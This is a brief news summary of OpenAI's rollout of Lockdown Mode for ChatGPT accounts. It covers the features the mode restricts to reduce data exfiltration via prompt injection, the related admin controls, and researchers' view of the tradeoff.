Overview
- OpenAI began rolling out Lockdown Mode in early June to eligible personal accounts and self‑serve ChatGPT Business subscriptions so users and workspace administrators can enable it from Settings.
- When enabled, Lockdown Mode disables or limits features that make outbound network requests, including live web browsing (to cached content only), Deep Research, Agent Mode, image retrieval/display, Canvas networking, and file downloads.
- OpenAI says the feature is meant as a last‑stage mitigation that lowers the chance an attacker can move stolen data off a session but does not stop prompt injections from appearing in content or guarantee complete prevention of exfiltration.
- The rollout includes account controls such as an Active Sessions manager and works with workspace admin controls so administrators can restrict app and connector actions for members using Lockdown Mode.
- Security researchers call the move a pragmatic but blunt tradeoff between safety and functionality and advise adding pre‑model scanners, secret scrubbing and tool‑result inspection to catch exfiltration attempts without disabling features entirely.